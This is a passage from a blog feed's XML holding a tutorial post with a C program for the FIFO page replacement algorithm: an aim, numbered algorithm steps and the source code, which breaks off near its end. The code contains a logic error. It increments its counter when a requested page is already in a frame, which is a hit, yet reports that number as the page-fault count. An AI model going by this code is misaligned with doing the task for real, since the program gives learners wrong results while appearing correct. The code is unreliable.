xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFgZpCYPyjMVPcFiRH0pEWpgsqjo40bsmQEwVs58uZ_JE-bVDd-tK-yc3ALqly1s26a79FbWEjo8G6kwpNeuQgs8Rj6SDkm4r_JRqBgUHuF4_l-mLNNEC9-irf26GXIyx32iYorHK5lp8/s72-c/2_25_10%252520volusion%252520keyloggers.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-669009266496406622</id><published>2013-10-24T14:53:00.001+05:30</published><updated>2013-10-24T23:25:31.355+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Programs"/><title type='text'>Program for FIFO Page Replacement Algorithm in C</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px; text-align: center;&quot;&gt;
&lt;img alt=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zHtyWsTP_Y0Ua7Kg6jTqz0pjgdcrHpq5BdhRLiTwPwcBSp5hlhtm78mq7_OmRzt7Lem4ZPB9WpBlY0BwlEXuagTw3XfFlAp2BZIzSAUMYjy4FyUNRRUZk7oqDElXxAf18PGjwvPLv1Pc/s1600/c+and+c%252B%252B+meansofmine.jpg&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zHtyWsTP_Y0Ua7Kg6jTqz0pjgdcrHpq5BdhRLiTwPwcBSp5hlhtm78mq7_OmRzt7Lem4ZPB9WpBlY0BwlEXuagTw3XfFlAp2BZIzSAUMYjy4FyUNRRUZk7oqDElXxAf18PGjwvPLv1Pc/s1600/c+and+c%252B%252B+meansofmine.jpg&quot; style=&quot;background-color: #eeeeee; border: 1px solid rgb(204, 204, 204); margin: 0px 4px 4px 0px; padding: 6px;&quot; title=&quot;gouravinfo&quot; /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 14pt; line-height: 28px;&quot;&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px; text-align: center;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 14pt; line-height: 28px;&quot;&gt;IMPLEMENTATION OF FIFO PAGE REPLACEMENT ALGORITHM&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;b&gt;AIM&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-indent: 0.5in;&quot;&gt;
To write a c program to implement FIFO page replacement algorithm&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;b&gt;ALGORITHM&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
1. Start the process&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
2. Declare the size with respect to page length&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
3. Check the need of replacement from the page to memory&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
4. Check the need of replacement from old page to new page in memory&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
5. Forma queue to hold all pages&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
6. Insert the page require memory into the queue&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
7. Check for bad replacement and page fault&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
8. Get the number of processes to be inserted&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
9. Display the values&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
10. Stop the process&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 14pt;&quot;&gt;PROGRAM:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
#include&amp;lt;stdio.h&amp;gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
int main()&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
{&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify; text-indent: 0.5in;&quot;&gt;
int i,j,n,a[50],frame[10],no,k,avail,count=0;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf(&quot;\n ENTER THE NUMBER OF PAGES:\n&quot;);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-indent: 0.5in;&quot;&gt;
scanf(&quot;%d&quot;,&amp;amp;n);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf(&quot;\n ENTER THE PAGE NUMBER :\n&quot;);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for(i=1;i&amp;lt;=n;i++)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;scanf(&quot;%d&quot;,&amp;amp;a[i]);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf(&quot;\n ENTER THE NUMBER OF FRAMES :&quot;);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;scanf(&quot;%d&quot;,&amp;amp;no);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify; text-indent: 0.5in;&quot;&gt;
&lt;span lang=&quot;SV&quot;&gt;for(i=0;i&amp;lt;no;i++)&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;SV&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;frame[i]= -1;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;SV&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;j=0;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf(&quot;\tref string\t page frames\n&quot;);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in; text-align: justify;&quot;&gt;
for(i=1;i&amp;lt;=n;i++)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span lang=&quot;FR&quot;&gt;{&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;FR&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf(&quot;%d\t\t&quot;,a[i]);&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;FR&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;avail=0;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for(k=0;k&amp;lt;no;k++)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 1.5in; text-align: justify;&quot;&gt;
if(frame[k]==a[i])&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;{&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;avail=1;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;count++;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (avail==0)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;frame[j]=a[i];&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;j=(j+1)%no;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for(k=0;k&amp;lt;no;k++)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span lang=&quot;FR&quot;&gt;printf(&quot;%d\t&quot;,frame[k]);&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 1in; text-align: justify; text-indent: 0.5in;&quot;&gt;
}&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf(&quot;\n&quot;);&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in; text-align: justify; text-indent: 0.5in;&quot;&gt;
}&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf(&quot;Page Fault Is %d&quot;,count);&lt;/div&gt;
